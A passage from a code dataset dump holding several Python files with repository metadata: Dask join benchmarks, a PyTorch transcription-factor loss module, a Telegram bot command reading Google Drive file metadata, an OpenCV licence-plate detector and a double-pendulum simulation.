df1['hash_value'] = df1['user_id'].apply(lambda x: x % npartitions)\n df2['hash_value'] = df2['user_id'].apply(lambda x: x % npartitions)\n\n # Set \"hash_value\" column as the index\n df1 = df1.set_index('hash_value')\n df2 = df2.set_index('hash_value')\n\n # Repartition the DataFrame based on the index\n blocks_df1 = df1.repartition(npartitions=npartitions)\n blocks_df2 = df2.repartition(npartitions=npartitions)\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n # Concatenate the join results\n final_result = [\n self.perform_join(\n block1[block1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']],\n block2[block2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']],\n join_key\n )\n for block1, block2 in zip(blocks_df1.partitions, blocks_df2.partitions)\n ]\n # Compute and display the final result\n final_result = dd.compute(*final_result, num_workers=4)\n\n return final_result\n\n\n @timeit\n def semi_join(self, df1, df2, join_key, npartitions):\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n df1 = df1.reset_index(drop=True)\n df1 = df1.drop(columns='counter')\n\n df2 = df2.reset_index(drop=True)\n df2 = df2.drop(columns='counter')\n\n # Apply the timestamp constraint and select columns\n df1 = df1[df1['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n df2 = df2[df2['timestamp'] >= timestamp_constraint][['user_id', 'timestamp']]\n\n df1 = df1.set_index(join_key).repartition(npartitions=npartitions)\n df2 = df2.set_index(join_key).repartition(npartitions=npartitions)\n\n semi_join_result = dd.merge(df1, df2, left_index=True, right_index=True, how='inner')\n semi_join_result = semi_join_result.dropna().compute()\n\n semi_join_result.reset_index(drop=False, inplace=True)\n\n return semi_join_result\n\n\n def create_bloom_filter(self, partition):\n bloom_filter = BloomFilter(capacity=self.capacity, error_rate=0.1)\n partition.loc[:, 'user_id'] = partition['user_id'].astype(\"string\")\n partition['user_id'].apply(bloom_filter.add)\n return bloom_filter\n\n def merge_bloom_filters(self, bloom_filters):\n bit_arrays = [pd.Series(bloomf.bitarray) for bloomf in bloom_filters.compute()]\n\n # Perform union using a loop\n union_bit_array = bit_arrays[0]\n for bit_array in bit_arrays[1:]:\n union_bit_array |= bit_array\n\n final_bloom_filter = BloomFilter(capacity=self.capacity, error_rate=0.1)\n final_bloom_filter.bitarray = bitarray(union_bit_array.astype(bool).tolist())\n\n return final_bloom_filter\n\n @timeit\n def intersection_bloom_filter_join(self, df1, df2, join_key, npartitions):\n start = time.time()\n\n df1[join_key] = df1[join_key].astype('string')\n df2[join_key] = df1[join_key].astype('string')\n\n df1 = dd.from_pandas(df1, npartitions=npartitions)\n df2 = dd.from_pandas(df2, npartitions=npartitions)\n\n self.capacity = max([df1['user_id'].compute().unique().shape[0], df2['user_id'].compute().unique().shape[0]])\n\n bloom_filter1 = df1.map_partitions(self.create_bloom_filter, meta=pd.DataFrame(columns=df1.columns))\n bloom_filter2 = df2.map_partitions(self.create_bloom_filter, meta=pd.DataFrame(columns=df2.columns))\n\n merged_bloom_fitlers = self.merge_bloom_filters(bloom_filter1).intersection(\n self.merge_bloom_filters(bloom_filter2))\n\n print(f\"total time to build the filter {time.time() - start}\")\n\n timestamp_constraint = datetime.now() - relativedelta(years=2)\n\n df1 = \\\n df1[(df1[join_key].apply(lambda x: x in merged_bloom_fitlers)) & (df1['timestamp'] >= timestamp_constraint)][\n [join_key, 'timestamp']]\n df2 = \\\n df2[(df2[join_key].apply(lambda x: x in merged_bloom_fitlers)) & (df2['timestamp'] >= timestamp_constraint)][\n [join_key, 'timestamp']]\n\n df1 = df1.compute()\n df2 = df2.compute()\n\n final_result = pd.merge(df1, df2, on=join_key, how='inner')\n\n return final_result\n", "repo_name": "kostasrazgkelis/DDPassigment", "sub_path": "test_directory/test_join_methods.py", "file_name": "test_join_methods.py", "file_ext": "py", "file_size_in_byte": 8888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "warnings.filterwarnings", "line_number": 18, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil.cpu_count", "line_number": 23, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil", "line_number": 23, "usage_type": "name"}, {"api_name": "dask.tests.test_system.psutil.virtual_memory", "line_number": 24, "usage_type": "call"}, {"api_name": "dask.tests.test_system.psutil", "line_number": 24, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 65, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 70, "usage_type": "call"}, {"api_name": "ast.literal_eval", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 75, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "attribute"}, {"api_name": "ast.literal_eval", "line_number": 82, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 87, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 103, "usage_type": "call"}, {"api_name": "time.perf_counter", "line_number": 105, "usage_type": "call"}, {"api_name": "functools.wraps", "line_number": 101, "usage_type": "call"}, {"api_name": "dask.dataframe.merge", "line_number": 122, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 122, "usage_type": "name"}, {"api_name": "dask.delayed", "line_number": 119, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 128, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 128, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 128, "usage_type": "call"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 144, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 144, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 145, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 145, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 158, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 158, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 158, "usage_type": "call"}, {"api_name": "dask.dataframe.compute", "line_number": 170, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 170, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 178, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 178, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 179, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 179, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 181, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 181, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 181, "usage_type": "call"}, {"api_name": "dask.dataframe.merge", "line_number": 196, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 196, "usage_type": "name"}, {"api_name": "pybloom_live.BloomFilter", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 211, "usage_type": "call"}, {"api_name": "pybloom_live.BloomFilter", "line_number": 218, "usage_type": "call"}, {"api_name": "bitarray.bitarray", "line_number": 219, "usage_type": "call"}, {"api_name": "time.time", "line_number": 225, "usage_type": "call"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 230, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 230, "usage_type": "name"}, {"api_name": "dask.dataframe.from_pandas", "line_number": 231, "usage_type": "call"}, {"api_name": "dask.dataframe", "line_number": 231, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 235, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 236, "usage_type": "call"}, {"api_name": "time.time", "line_number": 241, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 243, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 243, "usage_type": "name"}, {"api_name": "dateutil.relativedelta.relativedelta", "line_number": 243, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 255, "usage_type": "call"}]}
+{"seq_id": "11282266863", "text": "import torch\nimport numpy as np\nis_gpu = False\nif torch.cuda.is_available():\n device = torch.device('cuda:0')\n is_gpu = True\nprint(\"is gpu \"+str(is_gpu))\n\nclass MOA():\n def __init__(self,data_obj,moa_factor,subset,beta):\n self.data_obj = data_obj\n tf_probing = (torch.eye(len(self.data_obj.tfs))).to(device)\n control_row = torch.zeros((1,len(self.data_obj.tfs))).to(device)\n self.probe = torch.cat((tf_probing,control_row),axis=0).to(device)\n self.moa_matrix = self.get_tf_gene_matrix()\n self.moa_factor = moa_factor\n self.subset = subset\n self.beta = beta\n\n def get_moa_loss(self,decoder):\n #create probe tensor\n moa_matrix = self.moa_matrix\n decoder_oputput = None\n mask = None\n probe = self.probe\n if self.subset != 0:\n selectedIndex = np.arange(len(self.data_obj.tfs))\n selectedIndex = np.random.permutation(selectedIndex)[0:self.subset]\n TF_index = selectedIndex.copy()\n selectedIndex = np.insert(selectedIndex,[-1],len(self.data_obj.tfs))\n\n moa_matrix = self.moa_matrix[TF_index,:]\n decoder_output = decoder(probe[selectedIndex,:])\n else:\n decoder_output = decoder(probe)\n mask = torch.logical_not(moa_matrix == 0)\n\n control_row = torch.masked_select(decoder_output[-1].repeat(moa_matrix.shape[0],1),mask)\n probe_rows = torch.masked_select(decoder_output[:-1],mask)\n\n diff = (probe_rows-control_row)\n #print(\"diff\",diff)\n\n moa_vals = torch.masked_select(moa_matrix,mask)\n\n violated = torch.logical_not(torch.eq(torch.sign(diff),moa_vals))\n violated_count = torch.count_nonzero(violated.int().detach()).detach()\n\n loss = torch.tensor(0.0, requires_grad = True)\n if torch.any(violated):\n violated_values = (torch.abs(diff))*violated.int()\n lossL1 = self.beta * torch.sum(torch.abs(violated_values))\n lossL2 = (1-self.beta) * torch.sum(torch.square(violated_values))\n loss = self.moa_factor * (lossL1 + lossL2)\n\n return loss,violated_count\n\n\n def get_tf_gene_matrix(self):\n gene_index_dict = {}\n for i in range(len(self.data_obj.overlap_list)):\n gene_index_dict[self.data_obj.overlap_list[i]] = i\n\n x_coords = []\n y_coords = []\n moa_val = []\n for i in range(len(self.data_obj.tfs)):\n tf = self.data_obj.tfs[i]\n tf_info = self.data_obj.tf_gene_dict[tf]\n for gene in tf_info.keys():\n gene_index = gene_index_dict[gene]\n moa = tf_info[gene]\n if moa != 0:\n x_coords.append(i)\n y_coords.append(gene_index)\n moa_val.append(moa)\n ind = [x_coords,y_coords]\n moa_matrix = torch.sparse_coo_tensor(ind,moa_val,([len(self.data_obj.tfs),len(self.data_obj.overlap_list)]))\n\n moa_matrix = moa_matrix.to_dense().to(device)\n\n return moa_matrix\n", "repo_name": "schaferd/Modular_DSCA_TF_Prediction", "sub_path": "moa.py", "file_name": "moa.py", "file_ext": "py", "file_size_in_byte": 3064, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.cuda.is_available", "line_number": 4, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 4, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 5, "usage_type": "call"}, {"api_name": "torch.eye", "line_number": 12, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.insert", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.masked_select", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.logical_not", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.sign", "line_number": 46, "usage_type": "call"}, {"api_name": "torch.count_nonzero", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.any", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.abs", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.square", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.sparse_coo_tensor", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "42671392752", "text": "from pyrogram.types import Message\r\nfrom pyrogram.emoji import BACKHAND_INDEX_POINTING_DOWN, MAGNIFYING_GLASS_TILTED_LEFT\r\nfrom pydrive2.drive import GoogleDrive\r\nfrom ...configs.texts import RESULT_IN_COUNT\r\n\r\nasync def drive_count(msg: Message, drive: GoogleDrive):\r\n \r\n try:\r\n message = await msg.reply(f\"Buscando archivo {MAGNIFYING_GLASS_TILTED_LEFT}...\")\r\n file = drive.CreateFile({'id': msg.text.split(' ')[1].split('/')[-2]})\r\n file.FetchMetadata()\r\n \r\n result = RESULT_IN_COUNT.format(\r\n \r\n file['title'], \r\n int(file['fileSize']) / 1000000, \r\n file['fileExtension'], \r\n file['mimeType'])\r\n\r\n await message.edit(result)\r\n except Exception as e:\r\n await msg.reply(f\"Error en el comando /count: {BACKHAND_INDEX_POINTING_DOWN}\\n\\n{e}\")", "repo_name": "Tnoob-dev/GDrive-Project", "sub_path": "src/plugins/drive_modules/count.py", "file_name": "count.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyrogram.types.Message", "line_number": 6, "usage_type": "name"}, {"api_name": "pydrive2.drive.GoogleDrive", "line_number": 6, "usage_type": "name"}, {"api_name": "pyrogram.emoji.MAGNIFYING_GLASS_TILTED_LEFT", "line_number": 9, "usage_type": "name"}, {"api_name": "configs.texts.RESULT_IN_COUNT.format", "line_number": 13, "usage_type": "call"}, {"api_name": "configs.texts.RESULT_IN_COUNT", "line_number": 13, "usage_type": "name"}, {"api_name": "pyrogram.emoji.BACKHAND_INDEX_POINTING_DOWN", "line_number": 22, "usage_type": "name"}]}
+{"seq_id": "17883424555", "text": "import cv2\nimport numpy as np\nimport math\nimport random\n\nimport MainScript\nimport EngineFiles.ReadChars as RC\nimport EngineFiles.Preprocessing as PP\nimport EngineFiles.PredictChar as PC\nimport EngineFiles.PredictPlate as PPL\n\nPLATE_WIDTH_PADDING_FACTOR = 1.3\nPLATE_HEIGHT_PADDING_FACTOR = 1.5\n\n\ndef lookupChars(img1):\n ListChars, countChars, imgC = [], 0, img1.copy()\n contours, hierC = cv2.findContours(imgC, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n h, w = img1.shape\n img1Cont = np.zeros((h,w,3), np.uint8)\n\n for i in range(len(contours)):\n if MainScript.showSteps == True:\n cv2.drawContours(img1Cont, contours, i, MainScript.BGR_white,)\n\n PredictChar = PC.PredictChar(contours[i])\n\n if RC.checkChar(PredictChar):\n countChars += 1\n ListChars.append(PredictChar)\n\n if MainScript.showSteps == True:\n print('\\nstep 2 - len(contours) =',len(contours))\n print('\\nstep 2 - countChars =', countChars)\n cv2.imshow('2a',img1Cont)\n\n return ListChars\n\n\ndef gainPlate(imgO, listChars):\n predictPlate = PPL.PredictPlate()\n listChars.sort(key = lambda mChar : mChar.centerX)\n flatPlateX = (listChars[0].centerX + listChars[len(listChars)-1].centerX) / 2\n flatPlateY = (listChars[0].centerY + listChars[len(listChars)-1].centerY) / 2\n coorPlateCenter = flatPlateX, flatPlateY\n PlateW = int((listChars[len(listChars) - 1].bRectX + listChars[len(listChars) - 1].bRectW - listChars[0].bRectX) * PLATE_WIDTH_PADDING_FACTOR)\n totalCharH = 0\n\n for i in listChars:\n totalCharH += i.bRectH\n\n flatAvgCharH = totalCharH / len(listChars)\n plateH = int(flatAvgCharH * PLATE_HEIGHT_PADDING_FACTOR)\n flatOpp = listChars[len(listChars) - 1].centerY - listChars[0].centerY\n flatHyp = RC.DistanceChars(listChars[0], listChars[len(listChars) - 1])\n flatCorrAngelRad = math.asin(flatOpp / flatHyp)\n flatCorrAngelDeg = flatCorrAngelRad * (180/math.pi)\n predictPlate.locPlate = (tuple(coorPlateCenter), (PlateW, plateH), flatCorrAngelDeg)\n rotMatrix = cv2.getRotationMatrix2D(tuple(coorPlateCenter), flatCorrAngelDeg, 1.0)\n h, w, numC = imgO.shape\n iRot = cv2.warpAffine(imgO, rotMatrix, (w, h))\n iCrop = cv2.getRectSubPix(iRot, (PlateW, plateH), tuple(coorPlateCenter))\n predictPlate.iPlate = iCrop\n\n return predictPlate\n\n\ndef CropPlates(img):\n ListPlates = []\n h, w, numC = img.shape\n\n GrayScale = np.zeros((h,w,1), np.uint8)\n thresh = np.zeros((h,w,1), np.uint8)\n contours = np.zeros((h,w,3), np.uint8)\n cv2.destroyAllWindows()\n\n if MainScript.showSteps == True:\n cv2.imshow('0', img)\n\n GrayScale, thresh = PP.preprocessing(img)\n\n if MainScript.showSteps == True:\n cv2.imshow('1a', GrayScale)\n cv2.imshow('1b', thresh)\n\n ListChars = lookupChars(thresh)\n\n if MainScript.showSteps == True:\n print('\\n Step 2 - length of ListChars =', len(ListChars))\n contours = np.zeros((h,w,3), np.uint8)\n Conts = []\n\n for n in ListChars:\n Conts.append(n.contour)\n\n cv2.drawContours(contours, Conts, -1, MainScript.BGR_white)\n cv2.imshow('2b', contours)\n\n FitChars = RC.DetectFitChars(ListChars)\n\n if MainScript.showSteps == True:\n print('\\nStep 3 - FitChars =', len(FitChars))\n contours = np.zeros((h,w,3), np.uint8)\n\n for i in FitChars:\n RandBlue = random.randint(0,255)\n RandGreen = random.randint(0,255)\n RandRed = random.randint(0,255)\n Conts = []\n\n for n in i:\n Conts.append(n.contour)\n\n cv2.drawContours(contours, Conts, -1, (RandBlue, RandGreen, RandRed))\n\n cv2.imshow('3', contours)\n\n for i in FitChars:\n predictPlate = gainPlate(img, i)\n\n if predictPlate.iPlate is not None:\n ListPlates.append(predictPlate)\n\n print(\"\\n\", len(ListPlates), \"possibilities found!\")\n\n if MainScript.showSteps == True:\n cv2.imshow(\"4a\", contours)\n\n for i in range(len(ListPlates)):\n p2fRpt = cv2.boxPoints(ListPlates[i].locPlate)\n cv2.line(contours, tuple(p2fRpt[0]), tuple(p2fRpt[1]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[1]), tuple(p2fRpt[2]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[2]), tuple(p2fRpt[3]), MainScript.BGR_red, 2)\n cv2.line(contours, tuple(p2fRpt[3]), tuple(p2fRpt[0]), MainScript.BGR_red, 2)\n cv2.imshow(\"4a\", contours)\n print(\"One of some predicted plate :\",i,\", click to continue!\")\n cv2.imshow('4b', ListPlates[i].iPlate)\n cv2.waitKey(0)\n\n print(\"\\nPlate detection complete!\")\n cv2.waitKey(0)\n\n return ListPlates", "repo_name": "devildances/ComputerVision-Plate_Recognition", "sub_path": "EngineFiles/ReadPlates.py", "file_name": "ReadPlates.py", "file_ext": "py", "file_size_in_byte": 4762, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "cv2.findContours", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.RETR_LIST", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 20, "usage_type": "attribute"}, {"api_name": "MainScript.showSteps", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 24, "usage_type": "call"}, {"api_name": "MainScript.BGR_white", "line_number": 24, "usage_type": "attribute"}, {"api_name": "EngineFiles.PredictChar.PredictChar", "line_number": 26, "usage_type": "call"}, {"api_name": "EngineFiles.PredictChar", "line_number": 26, "usage_type": "name"}, {"api_name": "EngineFiles.ReadChars.checkChar", "line_number": 28, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 28, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 32, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 35, "usage_type": "call"}, {"api_name": "EngineFiles.PredictPlate.PredictPlate", "line_number": 41, "usage_type": "call"}, {"api_name": "EngineFiles.PredictPlate", "line_number": 41, "usage_type": "name"}, {"api_name": "EngineFiles.ReadChars.DistanceChars", "line_number": 55, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 55, "usage_type": "name"}, {"api_name": "math.asin", "line_number": 56, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 57, "usage_type": "attribute"}, {"api_name": "cv2.getRotationMatrix2D", "line_number": 59, "usage_type": "call"}, {"api_name": "cv2.warpAffine", "line_number": 61, "usage_type": "call"}, {"api_name": "cv2.getRectSubPix", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 72, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 75, "usage_type": "call"}, {"api_name": "MainScript.showSteps", "line_number": 77, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 78, "usage_type": "call"}, {"api_name": "EngineFiles.Preprocessing.preprocessing", "line_number": 80, "usage_type": "call"}, {"api_name": "EngineFiles.Preprocessing", "line_number": 80, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 82, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 84, "usage_type": "call"}, {"api_name": "MainScript.showSteps", "line_number": 88, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 90, "usage_type": "attribute"}, {"api_name": "cv2.drawContours", "line_number": 96, "usage_type": "call"}, {"api_name": "MainScript.BGR_white", "line_number": 96, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 97, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars.DetectFitChars", "line_number": 99, "usage_type": "call"}, {"api_name": "EngineFiles.ReadChars", "line_number": 99, "usage_type": "name"}, {"api_name": "MainScript.showSteps", "line_number": 101, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 103, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 106, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 107, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 108, "usage_type": "call"}, {"api_name": "cv2.drawContours", "line_number": 114, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 116, "usage_type": "call"}, {"api_name": "MainScript.showSteps", "line_number": 126, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 127, "usage_type": "call"}, {"api_name": "cv2.boxPoints", "line_number": 130, "usage_type": "call"}, {"api_name": "cv2.line", "line_number": 131, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 131, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 132, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 133, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 133, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 134, "usage_type": "call"}, {"api_name": "MainScript.BGR_red", "line_number": 134, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 135, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 137, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 138, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 141, "usage_type": "call"}]}
+{"seq_id": "17313020901", "text": "'''\ndate: 08/03/22\nexercise: 8.15\n\ndesc: solves the double pendulum system using fourth-order runge kutta, plots the system's energy over time, and animates \nthe system \n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import cos,sin,pi\nfrom matplotlib.animation import FuncAnimation\nplt.style.use('dark_background')\n\nl = 0.4 \nm = 1\ng = 9.8\nt0,tf = 0.0,100.0\nN = 10000\nh = 1e-3\nt_points = np.linspace(t0,tf,N)\nr = np.empty((4,N),float)\nr[:,0] = [pi/2,pi/2,0,0]\n\ndw1 = lambda r: -( pow(r[2],2)*sin(2*r[0]-2*r[1]) + 2*pow(r[3],2)*sin(r[0]-r[1]) + (g/l)*(sin(r[0]-2*r[1]) + 3*sin(r[0])) )/( 3 - cos(2*r[0]-2*r[1]) )\ndw2 = lambda r: ( 4*pow(r[2],2)*sin(r[0]-r[1]) + pow(r[3],2)*sin(2*r[0]-2*r[1]) + 2*(g/l)*(sin(2*r[0]-r[1]) - sin(r[1])) )/( 3 - cos(2*r[0]-2*r[1]) )\nf = lambda r,t: np.array( [r[2],r[3],dw1(r),dw2(r)] )\n\nfor t in range(N-1):\n rt = r[:,t]\n tt = t_points[t]\n k1 = h*f(rt,tt)\n k2 = h*f(rt+0.5*k1,tt+0.5*h)\n k3 = h*f(rt+0.5*k2,tt+0.5*h)\n k4 = h*f(rt+k3,tt+h)\n r[:,t+1] = rt + (k1 + 2*k2 + 2*k3 + k4)/6.0\n\n\nE = [-m*g*l*(2*cos(2*r[0,t])+cos(r[1,t])) + m*pow(l,2)*(r[2,t]**2 + 0.5*r[3,t]**2 + r[2,t]*r[3,t]*cos(r[0,t]-r[1,t])) for t in range(N)]\nplt.plot(t_points,E)\nplt.show() \n\nn = 1000\nfig,ax = plt.subplots(1,figsize=(7,6))\npos1 = np.array ( [[ l*sin(r[0,t]) for t in range(N) ],[-l*cos(r[0,t]) for t in range(N)]])\npos2 = np.array([[l*(sin(r[0,t])+sin(r[1,t])) for t in range(N) ],[-l*(cos(r[0,t])+cos(r[1,t])) for t in range(N)]])\npivot, = ax.plot([0],[0],'wo',zorder=2)\nm1, = ax.plot(pos1[0,0],pos1[1,0],color='magenta',marker='o',zorder=1)\nm2, = ax.plot(pos2[0,0],pos2[1,0],color='magenta',marker='o',zorder=1)\nr1, = ax.plot(np.linspace(0,pos1[0,0],n),np.linspace(0,pos1[0,0],n)*pos1[1,0]/pos1[0,0],'w',zorder=0)\nm = (pos2[1,0]-pos1[1,0])/(pos2[0,0]-pos1[0,0])\nb = pos1[1,0] - m*pos1[0,0]\nr2, = ax.plot(np.linspace(pos1[0,0],pos2[0,0],n),m*np.linspace(pos1[0,0],pos2[0,0],n)+b,'w',zorder=0)\n\ndef init():\n m1.set_data([],[])\n m2.set_data([],[])\n r1.set_data([],[])\n r2.set_data([],[])\n\ndef animate(t):\n m1.set_data(pos1[0,t],pos1[1,t])\n m2.set_data(pos2[0,t],pos2[1,t])\n r1.set_data(np.linspace(0,pos1[0,t],n),np.linspace(0,pos1[0,t],n)*pos1[1,t]/pos1[0,t])\n m = (pos2[1,t]-pos1[1,t])/(pos2[0,t]-pos1[0,t])\n b = pos1[1,t] - m*pos1[0,t]\n r2.set_data(np.linspace(pos1[0,t],pos2[0,t],n),np.linspace(pos1[0,t],pos2[0,t],n)*m+b)\n\nax.set(xlim=[-1,1],ylim=[-1,0.4],xticks=[],yticks=[],title='double pendulum')\nanim = FuncAnimation(fig,animate,frames=N,init_func=init,interval=1)\nplt.show()", "repo_name": "jonathanhouse/selected-physics-projects", "sub_path": "animations/double_pendulum/ex815.py", "file_name": "ex815.py", "file_ext": "py", "file_size_in_byte": 2566, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 22, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 23, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 25, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 25, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 26, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "math.cos", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 